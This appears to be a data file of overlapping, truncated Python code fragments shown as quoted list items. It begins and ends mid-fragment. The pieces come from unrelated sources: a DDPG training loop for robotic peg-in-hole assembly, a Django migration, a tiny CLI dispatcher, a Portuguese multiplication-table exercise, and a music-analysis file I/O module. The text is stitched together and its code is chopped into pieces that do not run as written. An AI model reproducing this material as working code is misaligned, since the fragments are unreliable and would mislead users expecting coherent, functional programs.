q_value = 0.", "nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action =", "if info is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done", "epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed", "mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats", "== nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8]))", "epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes)", "combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model')", "info is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done =", "as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles,", "exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps", "env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True env # # if", "render: # forcement.append(new_obs[0:6]) # # 
print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch", "train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr,", "1 # pull_done = False # while pull_done is False and info: #", "agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" +", "epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes)", "and start pull the pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole", "import deque import pickle import sys from baselines import logger from simulation_ddpg import", "r delta = r - Long_term_reward # if memory.nb_entries >= batch_size and param_noise", "rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle", "= [] epoch_qs = [] Force_moments = [] epoch_episodes = 0 Long_term_reward =", "env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart,", "------------------------------------------------- File Name: Simulate_main Description : Author : <NAME> date: 18-1-12 ------------------------------------------------- Change", "next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value", "in env'.format(max_action)) model_directory = 
'/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma,", "epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and", "<NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8", "+ 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False,", "deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver", "param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2])", "memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2,", "# if memory.nb_entries >= batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes", "False and info: # pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe", "header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if", "epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr", "# env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles - 1 and cycle", "= logger.get_dir() if rank == 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir,", "\"\"\" agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward = 0. 
q_value =", "0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10,", "* r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The", "everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess)", ">= batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma +", "\"\"\" # -*- coding: utf-8 -*- import os import time from collections import", "logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0 and logdir: if hasattr(env,", "tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2,", "1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = new_obs \"\"\"Episode done and", "t_rollout + 1) if epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles", "# if env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10, 1 / nb_epochs)", "pull_safe = env.pull_up() #True env # # if pull_safe is False: # logger.info('Pull", "step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') #", "the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate", "execution in env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward +=", "env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm,", "agent.log_scalar(\"critic_loss\", 
mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\",", "delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps", "def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg,", "# pull_done, pull_safe = env.pull_up() #True env # # if pull_safe is False:", "combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] =", "# saver = tf.train.Saver() # else: # saver = None # eval_episode_rewards_history =", "pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for", "\"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr,", "header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf", "the exceed force!!!') # exit() break \"\"\"Episode failed and start pull the pegs", "mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards", "mpi_mean(stats[key]) \"\"\"Rollout statistics. 
compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards)", "cycle 20 times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = []", "= time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {} for key in", "logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl,", "# re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key", "pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for the", "0.10 for epoch in range(nb_epochs): \"\"\"Show the result for cycle 20 times and", "if memory.nb_entries >= batch_size and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance)", "epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False # while pull_done", "# re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False,", "param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the", "\"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the", "re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps)", "delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in 
range(nb_epoch_cycles): \"\"\"environment reset \"\"\"", "nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr,", "into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\"," ]
[ "on 2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations =", "2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret',", "# Generated by Django 2.2.9 on 2019-12-30 10:47 from django.db import migrations, models", "Django 2.2.9 on 2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "dependencies = [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', name='expiry_date', field=models.DateTimeField(blank=True,", "= [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', name='expiry_date', field=models.DateTimeField(blank=True, null=True),", "models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField(", "2.2.9 on 2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "[ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', name='expiry_date', field=models.DateTimeField(blank=True, null=True), ),", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations", "10:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'),", "by Django 2.2.9 on 2019-12-30 10:47 from django.db import migrations, models class Migration(migrations.Migration):", "Generated by Django 2.2.9 on 2019-12-30 10:47 from django.db import migrations, models class", "Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', 
name='expiry_date',", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ]", "class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret',", "migrations, models class Migration(migrations.Migration): dependencies = [ ('secret', '0001_initial'), ] operations = [", "('secret', '0001_initial'), ] operations = [ migrations.AlterField( model_name='secret', name='expiry_date', field=models.DateTimeField(blank=True, null=True), ), ]" ]
[ "pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category return {'issue':", "module.\"\"\" from .issue import issue from .pr import pr def handle_category_action(args): \"\"\"Handle the", "\"\"\"Main module.\"\"\" from .issue import issue from .pr import pr def handle_category_action(args): \"\"\"Handle", "def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category return {'issue': issue,", "from .pr import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category =", "the category specific action.\"\"\" category = args.category return {'issue': issue, 'pr': pr}.get(category, issue)", ".issue import issue from .pr import pr def handle_category_action(args): \"\"\"Handle the category specific", "import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category return", "handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category return {'issue': issue, 'pr':", "issue from .pr import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category", "\"\"\"Handle the category specific action.\"\"\" category = args.category return {'issue': issue, 'pr': pr}.get(category,", "<gh_stars>0 \"\"\"Main module.\"\"\" from .issue import issue from .pr import pr def handle_category_action(args):", ".pr import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\" category = args.category", "import issue from .pr import pr def handle_category_action(args): \"\"\"Handle the category specific action.\"\"\"", "from .issue import issue from .pr import pr def handle_category_action(args): \"\"\"Handle the category" ]
[ "= {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8", "na tela a sua tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13)", "{n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}')", "# Faça um programa que leia um número inteiro qualquer e mostre na", "{n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x {n1} = {10*n1}')", "um programa que leia um número inteiro qualquer e mostre na tela a", "{5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x", "print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1}", "qualquer e mostre na tela a sua tabuada. n1 = int(input('Digite um número", "print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1}", "{4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x", "{7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x", "{n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}')", "que leia um número inteiro qualquer e mostre na tela a sua tabuada.", "= {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6", "print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1}", "= int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2", "= {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10", "{n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}')", "x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} =", "{n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}')", "e mostre na tela a sua tabuada. 
n1 = int(input('Digite um número qualquer:", "= {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5", "x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} =", "programa que leia um número inteiro qualquer e mostre na tela a sua", "x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} =", "')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3", "= {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x {n1} = {10*n1}') print('-'*13)", "{3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x", "mostre na tela a sua tabuada. n1 = int(input('Digite um número qualquer: '))", "print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x", "Faça um programa que leia um número inteiro qualquer e mostre na tela", "sua tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1}", "print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1}", "print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1}", "{6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9 x", "{n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x {n1} = {5*n1}')", "qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}')", "tela a sua tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1", "inteiro qualquer e mostre na tela a sua tabuada. 
n1 = int(input('Digite um", "{1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x", "x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} =", "x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x {n1} =", "x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} =", "um número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1}", "{n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}')", "= {4*n1}') print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7", "{n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}')", "x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} =", "tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1} =", "{2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4 x {n1} = {4*n1}') print(f'5 x", "x {n1} = {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} =", "print(f'6 x {n1} = {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1}", "int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x", "leia um número inteiro qualquer e mostre na tela a sua tabuada. n1", "um número inteiro qualquer e mostre na tela a sua tabuada. n1 =", "número inteiro qualquer e mostre na tela a sua tabuada. n1 = int(input('Digite", "a sua tabuada. n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x", "= {6*n1}') print(f'7 x {n1} = {7*n1}') print(f'8 x {n1} = {8*n1}') print(f'9", "print(f'8 x {n1} = {8*n1}') print(f'9 x {n1} = {9*n1}') print(f'10 x {n1}", "= {1*n1}') print(f'2 x {n1} = {2*n1}') print(f'3 x {n1} = {3*n1}') print(f'4", "print(f'5 x {n1} = {5*n1}') print(f'6 x {n1} = {6*n1}') print(f'7 x {n1}", "n1 = int(input('Digite um número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}')", "número qualquer: ')) print('-'*13) print(f'1 x {n1} = {1*n1}') print(f'2 x {n1} =" ]
[ "relative strength to a file. Parameters ---------- tempi : numpy array Array with", "the file if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a", "t2 = strength = np.nan # only one tempo was detected if len(tempi)", "information from the given file. Tempo information must have the following format: 'main", "less than tempi) if len(tempi) - len(strengths) == 1: strengths = np.append(strengths, 1.", "'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the", "contain labelled segments # 'label' needs to be castable to str SEGMENT_DTYPE =", "as comment. Returns ------- key : str Key name. \"\"\" write_events([key], filename, fmt='%s',", "1. # consider only the two strongest tempi and strengths elif len(tempi) >", "to load the events from. Returns ------- numpy array Events. Notes ----- Comments", "> 1: if downbeats: # rows with a \"1\" in the 2nd column", "read the labelled segments from. Returns ------- segments : numpy structured array Structured", "if needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from", ": float The most dominant tempo. tempo_2 : float The second most dominant", "'%.3f'), a sequence of formats, or a multi-format string (e.g. '%.3f %.3f'), in", "f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load", "distinguish between tempi and strengths. `values` > `split_value` are interpreted as tempi [bpm],", "a sequence of formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f", "# dtype for numpy structured arrays that contain labelled segments # 'label' needs", "'%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f %s'), in which case", "to write the events to. 
fmt : str or sequence of strs, optional", "numpy structured array with three named columns: 'start' contains the start position (e.g.", "tempi and the relative strength to a file. Parameters ---------- tempi : numpy", "segments are represented as numpy structured array with three named columns: 'start' contains", "the beats from. downbeats : bool, optional Load only downbeats instead of beats.", "to contain only the downbeats (i.e. only the times of those beats with", "np.sum(strengths) # relative strengths are given (one less than tempi) if len(tempi) -", "number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename,", "format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters ---------- filename : str or file", "\"\"\" Write key string to a file. Parameters ---------- key : str Key", "is deprecated as of version 0.16 and ' 'will be removed in 0.18.", "strengths elif len(tempi) > 1: t1, t2 = tempi[:2, 0] strength = tempi[0,", "in 0.18. Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def", "ValueError('unknown format for `notes`') # truncate format to the number of colums given", "sort the ' 'tempi manually') if t1 > t2: t1, t2, strength =", "the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None,", "str or file handle File to read the labelled segments from. Returns -------", "If `beats` contains both time and number of the beats, they are filtered", "if fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter,", "file, one floating point number per line. 
Parameters ---------- filename : str or", "import warnings warnings.warn('`sort` is deprecated as of version 0.16 and will be '", "truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t',", "(e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which case", "def open_file(filename, mode='r'): \"\"\" Context manager which yields an open file or handle", "'%.3f %d'), in which case `delimiter` is ignored. delimiter : str, optional String", "to. fmt : str or sequence of strs, optional A single format (e.g.", "\"\"\" Load tempo information from the given file. Tempo information must have the", "the given file. Tempo information must have the following format: 'main tempo' ['secondary", ": str Key name. filename : str or file handle Output file. header", "formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'), in which", "= values[values <= split_value] # make the strengths behave properly strength_sum = np.sum(strengths)", "into tempi and strengths # TODO: this is kind of hack-ish, find a", "column is the event's time, the rest is ignored return events[:, 0] def", "and will be ' 'removed in 0.18. Please truncate the returned array '", "array of length 'num_tempi' is returned. If strengths are given, a 2D array", "import contextlib import numpy as np from .audio import load_audio_file from .midi import", "point number per line. Parameters ---------- filename : str or file handle File", "numpy array and write to output out = np.array([t1, t2, strength], ndmin=2) write_events(out,", "file. delimiter : str, optional String or character separating columns. header : str,", "file handle File to load the beats from. downbeats : bool, optional Load", "the notes to. fmt : str or sequence of strs, optional A sequence", "the strengths behave properly strength_sum = np.sum(strengths) # relative strengths are given (one", "------- numpy array Notes. 
\"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t',", "ndmin=1) if values.ndim > 1: if downbeats: # rows with a \"1\" in", "str or file handle File to write the notes to. fmt : str", "= line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end']", "of formats, or a multi-format string (e.g. '%.3f %.3f'), in which case `delimiter`", "we want # tempi with uniformly distributed strengths to keep their order sort_idx", "was detected if len(tempi) == 1: t1 = tempi[0][0] strength = 1. #", "'%.3f %d %.3f %d', in which case `delimiter` is ignored. delimiter : str,", "File to read key information from. Returns ------- str Key. \"\"\" with open_file(filename)", "of the file as comment. Returns ------- key : str Key name. \"\"\"", "None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords =", "are floating point numbers, and <label> is a string. Parameters ---------- filename :", "or file handle Output file. delimiter : str, optional String or character separating", "the segment label. \"\"\" if fmt is None: fmt = ['%.3f', '%.3f', '%s']", "the beginning of the file as comment. mirex : bool, deprecated Report the", "structured array with three named columns: 'start' contains the start position (e.g. seconds),", "filename : str or file handle File (handle) to open. mode: {'r', 'w'}", ": str or file handle File to load the downbeats from. Returns -------", "f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string to a file. Parameters", "# TODO: this is kind of hack-ish, find a better solution tempi =", "# set default format if fmt is None: fmt = ['%.3f', '%d', '%.3f',", "text file, one floating point number per line. 
Parameters ---------- filename : str", "'%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes", "structured arrays that contain labelled segments # 'label' needs to be castable to", "<= `split_value` are interpreted as strengths. sort : bool, deprecated Sort the tempi", "as comment. Returns ------- numpy structured array Labelled segments Notes ----- Labelled segments", "number of 1). \"\"\" if beats.ndim == 2: beats = beats[beats[:, 1] ==", "structured array Structured array with columns 'start', 'end', and 'label', containing the beginning,", "Tempo information must have the following format: 'main tempo' ['secondary tempo' ['relative_strength']] Parameters", "in 0.18. Please sort the returned array ' 'separately.') # Note: use 'mergesort',", "handle File (handle) to open. mode: {'r', 'w'} Specifies the mode in which", "'%d', '%.3f', '%d']), or a multi-format string, e.g. '%.3f %d %.3f %d', in", "e in events: try: string = fmt % tuple(e.tolist()) except AttributeError: string =", "if values.ndim > 1: if downbeats: # rows with a \"1\" in the", "Beats or downbeats to be written to file. filename : str or file", "format (e.g. '%.3f'), a sequence of formats, or a multi-format string (e.g. '%.3f", "numpy array Events to be written to file. filename : str or file", "def load_notes(filename): \"\"\" Load the notes from the given file, one note per", "fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def", "or handle. fmt : str or sequence of strs, optional A sequence of", "strength_sum = np.sum(strengths) # relative strengths are given (one less than tempi) if", "strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths =", "('end', np.float), ('label', object)] # overwrite the built-in open() to transparently apply some", "information from. Returns ------- str Key. 
\"\"\" with open_file(filename) as f: return f.read().strip()", "import absolute_import, division, print_function import io as _io import contextlib import numpy as", "to their filename into tempi and strengths # TODO: this is kind of", "write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from", "------- numpy array Events. Notes ----- Comments (lines starting with '#') and additional", "Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write", "most `max_len` tempi. Returns ------- tempi : numpy array, shape (num_tempi[, 2]) Array", "which yields an open file or handle with the given mode and closes", "array ' 'separately.') return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\"", "of version 0.16 ' 'and will be removed in version 0.17. Please sort", "their strengths if sort: import warnings warnings.warn('`sort` is deprecated as of version 0.16", "return values[values[:, 1] == 1][:, 0] else: # 1st column is the beat", "np.array(events) # reformat fmt to be a single string if needed if isinstance(fmt,", "comment. \"\"\" events = np.array(events) # reformat fmt to be a single string", "`notes`') # truncate format to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]])", "a sequence of formats, or a multi-format string (e.g. 
